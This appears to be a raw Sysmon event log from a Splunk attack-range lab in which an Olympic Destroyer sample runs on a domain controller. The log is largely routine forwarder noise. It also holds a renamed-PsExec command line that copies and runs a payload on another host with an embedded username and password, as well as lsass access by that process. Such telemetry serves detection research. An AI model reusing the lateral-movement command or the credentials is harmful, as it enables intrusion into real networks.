10341000x8000000000000000295418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.737{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.735{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.734{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.734{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.134{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=329C1117653BAE373921DC87D7420666,SHA256=8AB79B334B5743F1F5C8DFABA309AF0800CA6FA57FC21D12486776BE61CB0A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.738{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E59427DB7FF7A3AC772B7F201BB9E04D,SHA256=7656A813D8A38A32005E5DF0D66BDA7CEB8C59E4825ACA3B1F7BE7253F4786E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.737{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=229974EF5D72D1D3250C66344A7264A8,SHA256=E6868DB367DA1E4D0CFADE2374A87238962BDDB7CBEFE552C592B88A65CD6B14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.256{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.256{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.256{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6FE78350DC10DDCE1A947EF3F3BE09,SHA256=DDF919FD214F965CEE2F091502CDDEF41130BD255AA4E731AC9C9DA4C69C6E4A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000295429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:06:31.201{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 354300x8000000000000000219525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:29.674{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51526-false10.0.1.12-8000- 23542300x8000000000000000219524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:31.116{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A5D003D5703259824B4417FBAAEA07,SHA256=724AA93E7954F6BC5D31C38F78B51B68BB6360CC927E2CD18CF42D610ABD68EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:28.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49230-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.038{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-1536-6216-C206-000000003802}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.038{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1536-6216-C206-000000003802}7132C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.016{C8EA50B7-1536-6216-C206-000000003802}71324592C:\Windows\system32\conhost.exe{C8EA50B7-1536-6216-C106-000000003802}7008C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:32.269{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16C81EE3112DB1825977EFCAAC088371,SHA256=FD34BD47C735A3D335F1BE9AD86BC2526BDD9266CB607200914A8BA29E64F262,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:30.176{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx55995-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:32.132{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF27A5A3DADAA9F148269A80192665D7,SHA256=D97FC281358F2B3637DFFCA63FB39A957F525FEA8F481AF06622067E513F075E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:33.484{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3C02F5F407CA69F47437703DF02A48B6,SHA256=407E77832F77C3D672C908BED99078A61E826D4C1BCF73E89B39C7D70769902C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:33.284{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E17B61CD7327EF792B1AAA325D6CA62,SHA256=6A04E5A0FC500FC3536AE4BA8636C8DF48520739CAB53E219DA6D47C0AAC3413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:33.210{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A9E6946BAEAF2EA67539F812C29D2A3,SHA256=8D13A22C3D9FB8B3CF44635DC7EAD98144685FB0D64B5E2531A435C577B01F4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:33.163{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48053DE9D4B5B6D5249987D52E91265A,SHA256=B29904E226229C74DDE47F60ECEEDA764B53CFB1D2A3EA1AFCC92BF1DF960492,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:30.751{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54734- 23542300x8000000000000000295440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:34.315{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41A9DCB7AADCAE1630712DFD7C31779,SHA256=25518F9CB18292CF29699ACB4E59D19C9D0E09B77E0C3F328BC7FF8C23B65930,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:34.335{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EDD69F718DBB942C35BDDB0E4E55E91,SHA256=870B757402C7E11C4B5C10C88B8CD2A64A4FCFD01AD8C34E4339AD055D4CBD78,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:31.890{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54834- 23542300x8000000000000000219531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:35.350{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7310D9D8D158B9E7876299BC5A16FE35,SHA256=E6965DB9CF2C617A44183E540FF9DA859C983CC72038F542D1354F7B1CD236F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:35.415{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5BC7CE72A1399A938C87E88052365F,SHA256=1B8FBF415616981FC75CAC31134FB2C6C78A4F08E3AF144EC201222F4B6E3565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:36.417{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC53C0040036AD48DA1CDF4C8E8E2CE,SHA256=15372CFA80E517842C83353CE05FA651319D16B722524D6DAB8C478EB2D5B6A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:34.155{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx58387-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:36.366{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03ACC26629A40A4FACDB9BC631B8AE4B,SHA256=F089707015BE86BEE1E2B8E654FE1F2FA6B0C5170433F5897F4DB73729BB1A9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:37.638{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=A3ED7976A2F7D36F00B3BB156042BFD3,SHA256=F4AB2753FBCF694207A0671CF45380CAA22AD6553F5712213C61196DAF84CC16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:37.637{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:37.438{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1F771A3DDC64BD7855E8EB531B937E8,SHA256=89BF717CD11CDF65D0035A1C4641914BED244353E46EFE834FBE4842879CF8F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:35.627{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51527-false10.0.1.12-8000- 23542300x8000000000000000219535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:37.444{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BD114BC8779A2DA72F1203F4CE424F2,SHA256=1E9B52817F007B640590D0F914566A72B2EF2B18C146749D0D0880F2B07C1110,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:37.382{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A529AC85147D784229A4BE0F82C5B6,SHA256=94C55F763D6A426C0A5C2DB40AC2BA6080FD240F7B2E059183D336A9A6B5AD97,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:34.588{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49233-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:38.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5FA4538712D0371B401B7B5DDD29ED3,SHA256=4997216A63EE52B291E9CC4FD4F7BF186E9B55BD1C88920DF2242B9786A36666,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:38.460{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EEF93971EA60C436C40BDC19E5C0DF2,SHA256=BB0973B79F4E6796B23847935F5DA1E63A5A540D9DD9E2A890A6ECC571D9EEA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:38.017{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=47E3B41B9F29ECD12B298D546D0E01F9,SHA256=E409754E07FD3EF210CB4862CC42D92731CE8BD5BF5071EBF8B969F4319EB072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:39.995{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-149MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:39.473{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B592BA48A2C8D63ED6BDAFE60E2FBA,SHA256=8BC0D5FD9360C47F481412FB11633DEC90C8DB1C563F2A49E43F5353EA6724E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 